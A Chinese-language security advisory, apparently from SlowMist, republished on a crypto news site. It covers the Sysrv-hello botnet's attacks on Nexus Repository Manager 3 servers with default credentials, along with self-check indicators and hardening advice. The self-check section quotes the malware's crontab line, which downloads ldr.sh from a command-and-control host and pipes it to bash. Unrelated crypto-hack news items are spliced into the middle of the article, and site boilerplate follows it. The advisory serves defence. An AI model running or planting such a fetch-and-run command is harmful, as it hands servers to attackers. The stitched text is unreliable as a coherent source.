攻擊路徑
Sysrv-hello僵尸網絡對云上NexusRepositoryManager3存在默認帳號密碼的服務器進行攻擊,Maven私服部署會用到NexusRepositoryManager3,由于Maven是個流行服務,所以也給了Sysrv-hello僵尸網絡的大范圍感染機會。
當NexusRepositoryManager3服務對外網開放且存在默認賬號密碼時,Sysrv-hello就可以直接掃描入侵,利用NexusRepositoryManager3的Tasks功能模塊直接運行惡意腳本達到入侵服務器的目的。
慢霧:7月3日至7月7日期間?Web3生態因安全問題損失近1.3億美元:7月10日消息,慢霧發推稱,自7月3日至7月7日,Web3生態因安全問題遭遇攻擊損失128,419,000美元,包括Encryption AI、AzukiDao、NFT Trader、MIKE&SID、Bryan Pellegrino、Aptos Foundation、Multichain、CivFund。其中,Multichain被攻擊損失1.26億美元。[2023/7/10 10:12:36]
入侵到服務器后會自動下載執行ldr.sh文件,該文件主要功能:1.禁用Linux服務器防火墻(ufw)及清空iptables2.刪除aliyun、yunjing等主機安全軟件3.禁用apparmor、selinux、watchdog等安全機制4.刪除其他競品5.下載門羅幣挖礦程序進行挖礦,文件與進程名為network016.下載第二個木馬sysrv進行更高級操作7.在crontab里加上尾巴
慢霧:近期出現新的流行惡意盜幣軟件Mystic Stealer,可針對40款瀏覽器、70款瀏覽器擴展進行攻擊:6月20日消息,慢霧首席信息安全官@IM_23pds在社交媒體上發文表示,近期已出現新的加密貨幣盜竊軟件Mystic Stealer,該軟件可針對40款瀏覽器、70款瀏覽器擴展、加密貨幣錢包進行攻擊,如MetaMask、Coinbase Wallet、Binance、Rabby Wallet、OKX Wallet、OneKey等知名錢包,是目前最流行的惡意軟件,請用戶注意風險。[2023/6/20 21:49:05]
第二個木馬sysrv的主要功能:1.確保門羅幣挖礦程序network01正常運行2.進行蠕蟲傳播,隨機掃描其他IP服務,同樣進行NexusRepositoryManager3漏洞利用,同時也會嘗試入侵MySQL、Tomcat、WebLogic等服務
慢霧:Harmony Horizon bridge遭攻擊簡析:據慢霧安全團隊消息,Harmony Horizon bridge 遭到黑客攻擊。經慢霧 MistTrack 分析,攻擊者(0x0d0...D00)獲利超 1 億美元,包括 11 種 ERC20 代幣、13,100 ETH、5,000 BNB 以及 640,000 BUSD,在以太坊鏈攻擊者將大部分代幣轉移到兩個新錢包地址,并將代幣兌換為 ETH,接著將 ETH 均轉回初始地址(0x0d0...D00),目前地址(0x0d0...D00)約 85,837 ETH 暫無轉移,同時,攻擊者在 BNB 鏈暫無資金轉移操作。慢霧 MistTrack 將持續監控被盜資金的轉移。[2022/6/24 1:28:30]
自查方法
進程:network01sysrv
文件:/tmp/network01/tmp/sysrv/tmp/flag.txt
crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-
端口:52013
存在以上這些,停止備份樣本后刪除。
加固建議
刪除NexusRepositoryManager3Tasks里的惡意代碼NexusRepositoryManager3嚴禁外網訪問,嚴禁默認賬號密碼NexusRepositoryManager3升級為最新版本被入侵服務器備份重要數據后,重配置或重做檢查被入侵服務器是否存在直接訪問生產網其他服務的能力,存在則在生產網其他服務所在的服務器上進一步分析是否有異常免責聲明:作為區塊鏈信息平臺,本站所發布文章僅代表作者個人觀點,與鏈聞ChainNews立場無關。文章內的信息、意見等均僅供參考,并非作為或被視為實際投資建議。
本文來源于非小號媒體平臺:
慢霧科技
現已在非小號資訊平臺發布68篇作品,
非小號開放平臺歡迎幣圈作者入駐
入駐指南:
/apply_guide/
本文網址:
/news/9606255.html
免責聲明:
1.資訊內容不構成投資建議,投資者應獨立決策并自行承擔風險
2.本文版權歸屬原作所有,僅代表作者本人觀點,不代表非小號的觀點或立場
上一篇:
深入解析MakeDao在新周期里的機遇和風險
Tags:MANRYMAPOSPOSImanitosupertokenPosition Tokenposi幣是哪國的項目
1.數字貨幣寫進多地“十四五”規劃綱要草案專家建議擴大數字人民幣試點范圍。2.價值40億美元的比特幣期權合約即將將到期.
1900/1/1 0:00:00親愛的用戶: 為支持ERC20錢包進行安全升級,DigiFinex將于2021年1月25日14:30(GMT8)暫停ETH及所有ERC20代幣的充幣服務.
1900/1/1 0:00:00原文標題:《引介|Rollup不完全指南》 撰文:Fulvia 翻譯&校對:Shengchao&阿劍 譯者注: 原文中Rollup同時以單復數形式出現多次.
1900/1/1 0:00:00英國市場監管機構警告稱,如果消費者對那些承諾獲得高回報的加密資產類產品進行投資,那么,就應該做好“血本無歸”的準備。1月22日,比特幣價格繼續下探.
1900/1/1 0:00:00原標題:《加密上市潮已來》2020年底到2021年初頻繁傳來加密貨幣交易平臺上市進展的消息。然而,正如比特幣ETF一直難以獲得批準,目前成功上市的加密交易平臺寥寥無幾.
1900/1/1 0:00:00公告編號2021012501各位關心ZBG的投資者們和項目方:ZBG已完成FD換鏈工作,用戶在ZBG平臺的舊FD資產已切換為FD資產,平臺現已恢復FD的充值和提幣業務.
1900/1/1 0:00:00